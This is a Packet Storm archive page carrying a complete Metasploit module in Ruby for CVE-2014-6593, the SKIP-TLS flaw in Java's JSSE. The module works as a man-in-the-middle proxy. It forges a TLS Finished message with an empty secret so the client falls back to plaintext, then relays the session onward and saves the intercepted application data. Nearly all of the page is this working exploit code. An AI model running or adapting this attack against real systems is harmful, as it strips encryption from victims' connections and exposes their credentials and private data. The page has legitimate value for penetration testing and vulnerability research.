what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy

Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy
Posted Aug 12, 2015
Authored by Ramon de C Valle | Site metasploit.com

This Metasploit module exploits an incomplete internal state distinction in Java Secure Socket Extension (JSSE) by impersonating the server and finishing the handshake before the peers have authenticated themselves and instantiated negotiated security parameters, resulting in a plaintext SSL/TLS session with the client. This plaintext SSL/TLS session is then proxied to the server using a second SSL/TLS session from the proxy to the server (or an alternate fake server) allowing the session to continue normally and plaintext application data transmitted between the peers to be saved. This Metasploit module requires an active man-in-the-middle attack.

tags | exploit, java
advisories | CVE-2014-6593
SHA-256 | 22a68679289289a147b9ebdb5f0ea0fe01da2e11c5941c4f87b8111257d42ea5

Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'openssl'

class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Report

def initialize
super(
'Name' => 'Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy',
'Description' => %q{
This module exploits an incomplete internal state distinction in Java Secure
Socket Extension (JSSE) by impersonating the server and finishing the
handshake before the peers have authenticated themselves and instantiated
negotiated security parameters, resulting in a plaintext SSL/TLS session
with the client. This plaintext SSL/TLS session is then proxied to the
server using a second SSL/TLS session from the proxy to the server (or an
alternate fake server) allowing the session to continue normally and
plaintext application data transmitted between the peers to be saved. This
module requires an active man-in-the-middle attack.
},
'Author' =>
[
'Ramon de C Valle'
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service',
'References' => [
['CVE', '2014-6593'],
['CWE', '372'],
['URL', 'https://www.smacktls.com/#skip'],
['URL', 'https://www.smacktls.com/smack.pdf'],
['URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html'],
['URL', 'https://www-304.ibm.com/support/docview.wss?uid=swg21695474']
],
'DisclosureDate' => 'Jan 20 2015'
)

register_options(
[
OptString.new('FAKEHOST', [ false, 'The fake server address', nil]),
OptString.new('FAKEPORT', [ false, 'The fake server port', 443]),
OptString.new('HOST', [ true, 'The server address', nil]),
OptString.new('PORT', [ true, 'The server port', 443]),
OptString.new('SRVHOST', [ true, 'The proxy address', '0.0.0.0']),
OptString.new('SRVPORT', [ true, 'The proxy port', 443])
], self.class)
end

def cleanup
super
return unless @proxy

begin
@proxy.deref if @proxy.kind_of?(Rex::Service)
if @proxy.kind_of?(Rex::Socket)
@proxy.close
@proxy.stop
end
@proxy = nil
rescue ::Exception
end
end

def prf(secret, label, seed)
if secret.empty?
s1 = s2 = ''
else
length = ((secret.length * 1.0) / 2).ceil
s1 = secret[0..(length - 1)]
s2 = secret[(length - 1)..(secret.length - 1)]
end

hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, label + seed)
hmac_sha = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, label + seed)

hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, hmac_md5 + label + seed)
hmac_sha = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, hmac_sha + label + seed)

result = ''
[hmac_md5.length, hmac_sha.length].max.times { |i| result << [(hmac_md5.getbyte(i) || 0) ^ (hmac_sha.getbyte(i) || 0)].pack('C') }
result
end

def prf_sha256(secret, label, seed)
hmac_hash = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, label + seed)
OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, hmac_hash + label + seed)
end

def run
fake_host = datastore['FAKEHOST'] || datastore['HOST']
fake_port = datastore['FAKEPORT'] || datastore['PORT']
host = datastore['HOST']
local_host = datastore['SRVHOST']
local_port = datastore['SRVPORT']
port = datastore['PORT']

@proxy = Rex::Socket::TcpServer.create(
'LocalHost' => local_host,
'LocalPort' => local_port,
'Context' => {
'Msf' => framework,
'MsfExploit' => self
}
)
print_status('Listening on %s:%d' % [local_host, local_port])

thread_num = 0

loop do
framework.threads.spawn("Thread #{thread_num += 1}", false, @proxy.accept) do |client|
add_socket(client)
finished_sent = false
handshake_messages = ''
application_data = ''

print_status('Accepted connection from %s:%d' % [client.peerhost, client.peerport])

fake_server = Rex::Socket::Tcp.create(
'PeerHost' => fake_host,
'PeerPort' => fake_port,
'SSL' => true,
'SSLVerifyMode' => 'NONE',
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
})
add_socket(fake_server)

print_status('Connected to %s:%d' % [fake_host, fake_port])

server = Rex::Socket::Tcp.create(
'PeerHost' => host,
'PeerPort' => port,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
})
add_socket(server)

print_status('Connected to %s:%d' % [host, port])

version = nil
begin
loop do
readable, _, _ = Rex::ThreadSafe.select([client, server])

readable.each do |r|
case r
when fake_server
# The fake_server (i.e., server) is an SSL socket; Read
# application data directly.
header = ''
fragment = r.get_once(4096)
else
header = r.get_once(5)
raise EOFError if header.nil?
fragment_length = header[3, 2].unpack('n')[0]
fragment = ''
while fragment_length > 0
partial_fragment = r.get_once(fragment_length)
fragment << partial_fragment
fragment_length = fragment_length - partial_fragment.length
end
end

print_status('%d bytes received' % [header.length + fragment.length])

# Drop the server hello done message and send the finished
# message in plaintext.
if fragment =~ /^\x0e\x00\x00\x00/
if header[2, 1] == "\x03"
verify_data = prf_sha256('', 'server finished', OpenSSL::Digest::SHA256.digest(handshake_messages))
verify_data = verify_data[0, 12]
else
verify_data = prf('', 'server finished', OpenSSL::Digest::MD5.digest(handshake_messages) + OpenSSL::Digest::SHA1.digest(handshake_messages))
verify_data = verify_data[0, 12]
end

finished = "\x14#{[verify_data.length].pack('N')[1, 3]}#{verify_data}"
record = header[0, 3] + [finished.length].pack('n') + finished

count = client.put(record)
print_status('%d bytes sent' % [count])

finished_sent = true

# Change to the SSL socket connected to the same server or
# to an alternate fake server.
server.close
server = fake_server

# Save version used in the handshake
version = header[2, 1]
next
else
# Save handshake messages
handshake_messages << fragment
end unless finished_sent

# Save application data
application_data << fragment if finished_sent

case r
when client
if finished_sent
# The server (i.e., fake_server) is an SSL socket
count = server.put(fragment)
else
# The server isn't an SSL socket
count = server.put(header + fragment)
end

print_status('%d bytes sent' % [count])

when fake_server
# The client isn't an SSL socket; Add the record layer header
# with the same version used in the handshake.
header = "\x17\x03#{version}" + [fragment.length].pack('n')
record = header + fragment
count = client.put(record)
print_status('%d bytes sent' % [count])

when server
record = header + fragment
count = client.put(record)
print_status('%d bytes sent' % [count])
end
end
end

rescue EOFError, Errno::ECONNRESET
path = store_loot(
'tls.application_data',
'application/octet-stream',
client.peerhost,
application_data,
'application_data',
'TLS session application data'
)

print_good("SSL/TLS session application data successfully stored in #{path}")

client.close
fake_server.close
server.close

next
end

client.close
fake_server.close
server.close
end
end
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close